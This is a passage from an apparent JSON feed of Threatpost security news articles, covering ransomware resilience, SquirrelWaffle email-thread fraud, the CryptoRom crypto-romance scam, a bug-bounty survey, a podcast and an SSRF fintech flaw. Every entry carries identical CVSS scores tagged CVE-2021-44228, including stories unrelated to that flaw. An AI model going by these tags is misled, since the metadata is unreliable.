limit what and where each set of credentials can operate, and have different passwords for every domain.\n 2. Make sure that there is not one god-admin that can do everything.\n 3. It is also important to lock down or limit executives\u2019 access, as they are often easy targets.\n 4. Just as important, limit admin access and privileges, especially to backups.\n 5. Another common practice is to implement zero-trust approaches with multifactor authentication (MFA) and role-based access controls.\n 6. Also vital is to segment or microsegment your network into multiple zones of smaller networks and ensure access is managed and limited, especially to your most crucial data.\n 7. Many organizations are also moving towards a just-in-time security practice where access is granted on an as-needed basis or for a predetermined period of time, which is something to consider for crucial and business-critical data.\n\nBy building a variety of barriers, bad actors will be contained and prevented from moving around your environments. They are essentially stopped in their tracks. So, get creative\u2014meaning, set up a system unique to your needs and security requirements.\n\nWhen the Metropolitan Transportation Authority of New York was hacked last April, attackers did not gain any access to systems that control train cars nor was any customer information compromised. Why? Because they have a multilayered, segmented network of more than 18 different systems, only three of which were compromised. Thanks to this great system, the threat actors were prevented from moving throughout the system, the event was isolated and systems were restored quickly.\n\n_**Important reminder:**_ Create a walled-off network that looks exactly like your production network, but with different management credentials. Share nothing with your production networks except access to immutable storage. You can use this space to recover your data and services and scrub your data of malware. It is also a great place to test recovery.\n\nStay tuned for part two in this series, where I\u2019ll cover the remaining three of the top six steps you should take today to ensure ransomware resiliency in today\u2019s rapidly evolving cybersecurity landscape.\n\n**_Sonya Duffin is a ransomware and data protection expert at [Veritas Technologies](<https://www.veritas.com/>)._**\n\n_**Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>).**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T21:06:38", "type": "threatpost", "title": "3 Tips for Facing the Harsh Truths of Cybersecurity in 2022, Part I", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T21:06:38", "id": "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "href": "https://threatpost.com/harsh-truths-cybersecurity-tips/178311/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T22:38:10", "description": "[SquirrelWaffle](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) \u2013 the newish malware loader that[ first showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September \u2013 once again got its scrabbly little claws into an unpatched Microsoft Exchange server to spread malspam with its tried-and-true trick of [hijacking](<https://threatpost.com/ikea-email-reply-chain-attack/176625/>) email threads.\n\nThat\u2019s the same-old, same-old, as in, a SquirrelWaffle campaign will hijack an email thread to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent[ Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has operated.\n\nBut this time, the operators added a twist: They sucked knowledge out of an email thread and used it to trick the target into a money transfer.\n\nThey almost pulled it off. The targeted organization initiated a money transfer to an attacker-controlled account, but thankfully, one of the financial institutions involved in the transaction smelled a rat and flagged the deal as fraudulent.\n\nIn a Tuesday [post](<https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/>), Sophos analysts Matthew Everts and Stephen McNally said that typically, in SquirrelWaffle attacks \u2013 which typically entail the threat actors walking through holes left by unpatched, notorious,[ oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>)[ ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and[ ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities \u2013 the attack ends when those holes finally get patched, removing the attacker\u2019s ability to send emails through the server.\n\nBut in this recent engagement, the Sophos Rapid Response team found that while a SquirrelWaffle malspam campaign was wreaking havoc on an unpatched server, that same vulnerable server was being used by the attackers to siphon off knowledge from a stolen email thread and to launch a financial fraud attack.\n\n\u201cThe combination of Squirrelwaffle, ProxyLogon, and ProxyShell has been encountered by the Sophos Rapid Response team multiple times in the last few months, but this is the first time we have seen attackers use typo-squatting to maintain the ability to send spam once the Exchange server has been remediated,\u201d the analysts wrote.\n\n## Too Late to Patch That Leaky Exchange Roof\n\nIn this case, patching Exchange wouldn\u2019t have clipped SquirrelWaffle\u2019s tail, the analysts said, given that the attackers had already spirited away an email thread about customer payments from the victim\u2019s Exchange server.\n\nBesides which, as the analysts noted and as Sophos [detailed](<https://news.sophos.com/en-us/2021/03/25/patching-alone-is-not-enough-investigate-your-exposure-windows/>) last March, patching isn\u2019t the end-all, be-all for remediating vulnerable Exchange servers. For one thing, you also need to determine whether attackers have pulled off any other mischief, such as installing webshells.\n\n## Typosquatting Their Way Into Inboxes\n\nThe double-up attack on the vulnerable Exchange server started with the attackers registering a [typosquat](<https://threatpost.com/malformed-url-prefix-phishing-attacks-spike-6000/164132/>) domain. In other words, they registered a domain name that resembled the victim\u2019s legitimate domain but with a small typo, then used email addresses from the look-alike domain to reply to the email thread.\n\n\u201cMoving the conversation out of the victim\u2019s email infrastructure gave the attackers operational control over what happened next,\u201d Everts and McNally explained.\n\nWhat happened next was that the attackers tried to divert the victim\u2019s customer\u2019s payments to accounts they controlled. In their hunt for legitimacy, they went so far as to copy more email addresses, to make it look like they were requesting support from an internal department. But these additional email addresses were just as bogus, being sent with the same almost, not-quite, look-alike typosquat domain.\n\nNext, they started using \u201cthis transaction\u2019s ready to go!\u201d language, as in the screen capture Sophos provided below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163107/finance_dept_cc_ed.jpg>)\n\nSource: Sophos.\n\nNext came some foot-tappingly stern language to ratchet up the urgency, as shown in the next screen grab. \u201cI appreciate how busy you are,\u201d the crooks crooned, among other things that sounded like legitimate accounting blah-blah-blah, \u201cbut wondered if you could give me an update regarding the renewal?\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163737/More_accounting-ese.jpg>)\n\nSource: Sophos.\n\nThe attackers\u2019 fake accountant faux-relaxed after the SquirrelWaffle operators received an email indicating that the illegitimate payment was being processed, assuring their mark that they\u2019d get them an invoice ASAP.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15164119/kind_regards.jpg>)\n\nSource: Sophos.\n\n## How to Cage This Twitchy Rodent\n\nSophos offered advice on how to protect against malicious email attacks such as the SquirrelWaffle campaign, the first of which is a head-desk-bang-bang clich\u00e9: Namely, patch those servers.\n\n\u201cThe single biggest step defenders can take to prevent the compromise and abuse of on premises Microsoft Exchange servers is to ensure that they have been patched with the most recent updates from Microsoft,\u201d according to the post.\n\nAlso:\n\n * Implement industry standards for email authentication, such as SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain Message Authentication Reporting and Conformance, in order to make it easier for other organizations to figure out if emails are legitimate. \u201cUsing these standards can make it harder for an attacker to send spoofed emails impersonating your domain,\u201d Sophos said.\n * Consider email security products that integrate artificial intelligence to help fend off increasingly sophisticated social engineering attacks, phishing lures and impersonation messages.\n * Protect the recipients of such emails and ensure that users in your organization can spot phishing attempts and know how to report and respond to them.\n\nSophos also provided tips on what to do if your organization has already been attacked. In fact, it\u2019s put together a [Squirrelwaffle Incident Guide](<https://news.sophos.com/en-us/2022/02/15/rapid-response-the-squirrelwaffle-incident-guide/>) to help victims investigate, analyze and respond.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T22:31:33", "type": "threatpost", "title": "SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T22:31:33", "id": "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "href": "https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T20:53:33", "description": "For about a year now, crypto-traders and lovelorn singles alike have been losing their money to CryptoRom, a malware campaign that combines catfishing with crypto-scamming.\n\nAccording to [research](<https://news.sophos.com/en-us/2022/03/16/cryptorom-bitcoin-swindlers-continue-to-target-vulnerable-iphone-and-android-users/>) from Sophos, CryptoRom\u2019s perpetrators have now improved their techniques. They\u2019re leveraging new iOS features \u2013 [TestFlight](<https://developer.apple.com/testflight/>) and [WebClips](<https://support.apple.com/guide/deployment/%22>) \u2013 to get fake apps onto victims\u2019 phones without being subject to the rigorous app store approval process.\n\nSuccessful CryptoRom scams have resulted in five-, six- and even seven-figure losses for victims.\n\n## What is CryptoRom?\n\nWe do silly things when we\u2019re in love. In fact, [scientifically speaking](<https://link.springer.com/article/10.1007/s10508-015-0589-y>), our inhibitions and decision-making capabilities become impaired in the face of romance and sexual arousal.\n\nPerhaps that\u2019s why hackers have been so successful in targeting dating apps over the years. Last year, the Federal Trade Commission [reported](<https://consumer.ftc.gov/articles/what-you-need-know-about-romance-scams#:~:text=Romance%20scams%20reached%20a%20record,%2C%20Facebook%2C%20or%20Google%20Hangouts.>) that \u201cromance scams\u201d cost U.S. citizens over 300 million dollars in 2020, up 50 percent from 2019.\n\nCapitalizing on this trend, last year a new and well-coordinated campaign began targeting users of dating apps like Bumble, Tinder and Grindr. According to a Sophos [report](<https://news.sophos.com/en-us/2021/10/13/cryptorom-fake-ios-cryptocurrency-apps/>) last fall, the attackers\u2019 M.O. is to begin there, then move the conversation to messaging apps.\n\n\u201cOnce the victim becomes familiar, they ask them to install fake trading applications with legitimate looking domains and customer support,\u201d researchers explained.\n\nThe trading apps tend to be cryptocurrency-related, since, more so than with fiat currency, cryptocurrency payments are [irreversible](<https://www.uschamber.com/co/run/finance/accepting-cryptocurrency-as-payment#:~:text=Cryptocurrency%20transactions%20are%20irreversible&text=%E2%80%9CTransactions%20can%20be%20refunded%20only,has%20paid%2C%E2%80%9D%20wrote%20Inc.>).\n\n\u201cThey move the conversation to investment and ask them to invest a small amount, and even let them withdraw that money with profit as bait,\u201d according to Sophos. \u201cAfter this, they will be told to buy various financial products or asked to invest in special \u2018profitable\u2019 trading events. The new friend even lends some money into the fake app, to make the victim believe they\u2019re real and caring. When the victim wants their money back or gets suspicious, they get locked out of the account.\u201d\n\nThe ruse can go on quite a while before victims catch on. One anonymous person told Sophos that they lost more than $20,000, while another complained of investing $100,000 into the fake app, while bringing a brother and friends into the scheme unwittingly.\n\nIn the worst case thus far, one user wrote that \u201cI have invested all my retirement money and loan money, about $1,004,000. I had no idea that they would freeze my account, requiring me to pay $625,000, which is 20 percent taxes on the total profits before they will unfreeze my account.\u201d\n\nKarl Steinkamp, director at Coalfire, told Threatpost that the scam is a perfect storm of social engineering.\n\n\u201cAn overarching theme here is twofold: One, we are seeing the world\u2019s population rapidly wanting to adopt some format of crypto assets, whether this is Bitcoin, Ethereum or any one of the other 17K+ altcoins,\u201d he said. \u201cAnd two, there is an increasing need for end user (and company) security awareness training when utilizing, storing and transferring any crypto asset. Crypto and digital-asset protection includes different technologies and skills needed to adequately secure the resources.\u201d\n\nHe added, \u201cThe mixing of dating, money / lending, and social-engineering efforts is and will continue to be a potent combination for bad actors to continue to steal money from victims. Bad actors only need to find one crack in the armor, while individuals and companies need to protect against every avenue of threats.\u201d\n\n## What\u2019s New This Time?\n\nA crucial component to the CryptoRom attack flow is those fake apps. Victims might receive a link to download what purports to be BTCBOX, for example, or Binance \u2013 perfectly legitimate cryptocurrency trading platforms. These apps appear to have professional user interfaces, and even come with customer-service chat options.\n\nApple and Google apply strict vetting to weed out malicious mobile apps like these from their official stores. But, as Threatpost has [covered before](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>), hackers have clever tricks to get around conventional security testing. In the past, for example, CryptoRom\u2019s preferred method was to use [the Apple Developer Program and Enterprise Signatures](<https://threatpost.com/cryptorom-scammers-apple-enterprise-features/175474/>).\n\nNow, CryptoRom is taking advantage of two new iOS features.\n\nThe first, TestFlight, is a feature developers can use to distribute beta versions of their apps to testers.\n\n\u201cUnfortunately,\u201d wrote the researchers, \u201cjust as we\u2019ve seen happen with other alternative app distribution schemes supported by Apple, \u2018TestFlight Signature\u2019 is available as a hosted service for alternative iOS app deployment, making it all too simple for malware authors to abuse.\u201d\n\nCryptoRom has shifted from Enterprise Signatures towards TestFlight Signatures because, wrote Sophos, \u201cit is a bit cheaper\u201d \u2013 requiring only an .IPA file with a compiled iOS app. Apps also look \u201cmore legitimate when distributed with the Apple Test Flight App,\u201d researchers added. \u201cThe review process is also believed to be less stringent than App Store review.\u201d\n\n\u201cHackers leveraging Apple\u2019s TestFlight platform as a distribution mechanism for malicious apps is a clever \u2014 and relatively simple \u2014 tactic that can certainly lead to problems for victims,\u201d Ray Kelly, fellow at NTT Application Security, told Threatpost. \u201cUsers should understand that side-loading applications is always a precarious proposition. Apps that are downloaded and installed outside of the of the App Store or Google Play ecosystem have not been vetted for security and privacy risks, leaving the door wide open for attackers to compromise users\u2019 personal data and sometimes, their financial accounts.\u201d\n\nEven more so than TestFlight, CryptoRom attackers have been using WebClips, a feature that allows web links to be added to the iOS home screen like regular apps. Malicious WebClips mimic real apps like RobinHood (in the following case, \u201cRobinHand\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16132308/RobinHand.png>)\n\nA malicious WebClip offering in the Apple App Store. Source: Sophos.\n\n\u201cIn addition to App Store pages, all these fake pages also had linked websites with similar templates to convince users,\u201d the researchers wrote. \u201cThis shows how cheap and easy it is to mimic popular brands while siphoning thousands of dollars from victims.\u201d\n\nSince it\u2019s almost impossible for law enforcement to crack down on any one individual scam, app store providers hav a responsibility to monitor for misuse of these developer tools, Mark Lambert, vice president of products at ArmorCode, told Threatpost. He added, \u201cUltimately, however, the problem is a lack of security awareness. It is essential that users look for things that \u2018don\u2019t look right\u2019 and have a fundamental view of not trusting electronic communications or taking them on face value.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T17:32:59", "type": "threatpost", "title": "\u2018CryptoRom\u2019 Crypto Scam is Back via Side-Loaded Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T17:32:59", "id": "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "href": "https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T15:47:11", "description": "Enterprises are putting greater stock in cybersecurity, but outdated \u201csecurity by obscurity\u201d is still prevailing as companies wrestle with security awareness and shy away from bug-bounty programs.\n\nThat\u2019s according to new survey data from HackerOne, which found that a full 65 percent of organizations surveyed claimed that they \u201cwant to be seen as infallible.\u201d However, just as many \u2013 64 percent \u2013 said they practice a culture of security through obscurity, where secrecy is used as the primary method of protecting sensitive systems and assets.\n\n## Struggling with Security Awareness\n\nWhen it comes to what\u2019s actually happening on the ground inside organizations, 57 percent of respondents in the report \u2013 \u201cThe Corporate Security Trap: Shifting Security Culture from Secrecy to Transparency\u201d \u2013 said that they struggle to create a culture of cybersecurity, and only 26 percent are \u201cvery confident\u201d that staff are following security practices.\n\nWorse, only 12 percent of departments outside of security and IT make cyber-awareness and training a core focus, according to the survey.\n\nAnd that\u2019s translating to trouble: About 63 percent said they\u2019ve had a security breach as a result of staff sidestepping security measures.\n\nSome of the issues come from the top: Only 29 percent of boards are \u201cdeeply involved\u201d in cybersecurity strategy; and 65 percent said that the idea that security slows innovation is telegraphed to them.\n\nMeanwhile, 63 percent of organizations said that they believe that cybersecurity is \u201cas important as cost when choosing a supplier,\u201d and 62 percent of organizations \u201cwould take their business elsewhere if a supplier suffered a data breach.\u201d\n\n## The Problem with Secrecy\n\nThus, perhaps it\u2019s no wonder that 38percent of respondents agreed that their organizations \u201caren\u2019t open about their cybersecurity practices.\u201d\n\nBut according to the authors of the report, this kind of approach is harmful, because \u201cby not admitting weaknesses and asking for help fixing them, organizations risk far more significant damage to their brand should a vulnerability be exploited.\u201d\n\n\u201cSunshine is the best medicine,\u201d wrote HackerOne CTO and co-founder Alex Rice, in the report. \u201cShining a light on the work to be done is the only way to win. We must stop asking security teams to toil away in obscurity.\u201d\n\nThe report suggested a few general changes organizations can make, like reporting breaches to stakeholders and publishing reports outlining security measures that companies have in place. Another practical fix to a closed security culture would be putting into place Vulnerability Disclosure Policies (VDPs), bug-bounty programs and regular pentests that get third-party researchers involved.\n\nHowever, third-party vulnerability reporting comes with its own complications.\n\n## The Controversy Around Bug Bounties\n\nMajor corporations like [Google](<https://threatpost.com/google-product-abuse-bug-bounties/158940/>) and [Intel](<https://threatpost.com/intel-expands-bug-bounty-program-post-spectre-and-meltdown/129980/>) pay out thousands of dollars at a time \u2013 even [millions of dollars](<https://threatpost.com/google-record-high-bug-bounty-payouts/152354/>) every year \u2013 in bug-bounty programs. With the financial incentive to do so, outside researchers and friendly hackers help companies find zero-day vulnerabilities early, before the bad guys do.\n\nHowever, this new survey data shows that not everyone is on board, suggesting that not all security professionals are open to outside scrutiny. A full 67 percent of respondents said that they \u201cwould rather accept software vulnerabilities than work with hackers.\u201d\n\nAnd the hesitancy goes both ways. Ethical hackers are often dissuaded from reporting vulnerabilities to vendors, because they\u2019re so often [ignored or outright attacked](<https://threatpost.com/the-vulnerability-disclosure-process-still-broken/137180/>) for doing so. In October, for example, the governor of Missouri launched a [criminal investigation against a journalist](<https://threatpost.com/missouri-prosecute-hacker-data-leak/175501/>) who reported that the state\u2019s website was exposing hundreds of thousands of social security numbers on the web.\n\nIt\u2019s no surprise, then, that 50 percent of hackers \u201chave not disclosed a bug because of a [previous negative experience](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) or lack of channels through which to report,\u201d according to the report.\n\n## What Organizations Can Do\n\nTo establish trust and openness in corporate cybersecurity, HackerOne suggested four core tenets for corporate security responsibility. They are:\n\n * **Encouraging industry-wide transparency to build trust and share intelligence;**\n * **Fostering a culture of industry-wide collaboration that gives everyone the tools to take control of reducing cyber-risk;**\n * **Promoting innovation by inspiring development teams to build with security in mind and bring secure products to market faster;**\n * **And holding oneself and suppliers accountable to following best practices to develop security as an easy point of differentiation.**\n\nThe stakes are high: About 53 percent of survey respondents admitted that \u201cthey have lost customers as a result of a security breach.\u201d Bottom line? The sooner organizations evolve to be more open and collaborative about security, the better off they \u2013 and the rest of us, by extension \u2013 will be.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T15:30:19", "type": "threatpost", "title": "Most Orgs Would Take Security Bugs Over Ethical Hacking Help", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T15:30:19", "id": "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "href": "https://threatpost.com/orgs-security-bugs-ethical-hacking-help/178862/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T14:20:55", "description": "The baby upchucks. The dog loudly informs you that she\u2019s detected a budding squirrel armageddon. Your department\u2019s Zoom meeting starts in four minutes. The Bank of Fezziwig texts: If you haven\u2019t enabled online banking, click here.\n\nWhat. Do. You. DO?!?\n\nIt doesn\u2019t matter that you\u2019ve been working remotely since circa P.P. \u2013 that\u2019s Pre-Pandemic times. Now, your spouse is underfoot, your kids are bouncing off the walls of your quote-unquote office, you haven\u2019t had coffee, and you\u2019re pretty sure you don\u2019t even have an account at B of F, so you better just click that link and get the thing off your phone and out of your face.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nWrong answer! You\u2019ve been [smished](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>) by an attacker who sent a malicious link via SMS.\n\nTwo years into the pandemic, remote work has become common, but securing data is just as tough as it\u2019s always been. You don\u2019t have to look far to see tales of human error leading to cyber malfeasance: The human factor is at the base of most cyberattacks, from the employees who [fall for](<https://threatpost.com/bec-losses-top-18b/167148/>) business email compromise (BEC) attacks to whoever forgot to shut down that no-longer-used [VPN account](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>) that attackers used to launch the calamitous [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) ransomware attack.\n\nMark Loveless is a staff security researcher at GitLab, maker of the web-based Git repository. He\u2019s an expert at securing data when you\u2019ve got a remote, oftentimes frantically distracted workforce. After all, as GitLab [puts it](<https://about.gitlab.com/company/culture/all-remote/guide/>), it\u2019s \u201cone of the world\u2019s largest all-remote companies,\u201d with over 1,500 team members located in more than 65 countries around the world.\n\nMark visited the Threatpost podcast to give us an update on the world of remote work and to answer this question: Where are we now with data protection?\n\nCaution: If you\u2019re playing a drinking game based on how many times he\u2019ll say \u201c[Zero Trust](<https://threatpost.com/practical-guide-zero-trust-security/151912/>),\u201d stock the liquor cabinet before listening. Mark also cautioned that the dog might see a squirrel during our interview. It happens.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022522_Mark_Loveless_GitLab_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T14:00:53", "type": "threatpost", "title": "Securing Data With a Frenzied Remote Workforce\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T14:00:53", "id": "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "href": "https://threatpost.com/securing-data-frenzied-remote-workforce-podcast/178742/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:47:15", "description": "A [server-side request forgery (SSRF) flaw](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in an API of a large financial technology (fintech) platform potentially could have compromised millions of bank customers, allowing attackers to defraud clients by controlling their bank accounts and funds, researchers have found.\n\nA team at [Salt Security\u2019s](<https://salt.security/>) [Salt Labs](<https://salt.security/blog-authors/salt-labs>) identified the vulnerability in an API in a web page that supports the organization\u2019s platform fund transfer functionality, which allows clients to transfer money from their accounts on its platform into their bank accounts, researchers disclosed in [a report published Thursday](<https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover>).\n\nThe company in question\u2014dubbed \u201cAcme Fintech\u201d to preserve its anonymity\u2013offers a \u201cdigital transformation\u201d service for banks of all sizes, allowing the institutions to switch traditional banking services to online services. The platform already has been actively integrated into many banks\u2019 systems and thus has millions of active daily users, researchers said.\n\nIf the flaw had been exploited, attackers could have performed various nefarious activities by gaining administrative access to the banking system using the platform. From there they could have leaked users\u2019 personal data, accessed banking details and financial transactions, and performed unauthorized fund transfers into their own bank accounts, researchers said.\n\nUpon identifying the vulnerability, researchers reviewed their findings and provided recommended mitigation to the organization, they said.\n\n## **High Reward for Threat Actors**\n\nAPI flaws are often overlooked, but researchers at Salt Labs said in the report that they \u201csee vulnerabilities like this one and other API-related issues on a daily basis.\u201d\n\nIndeed, 5 percent of organizations experienced an API security incident in the past 12 months, according to 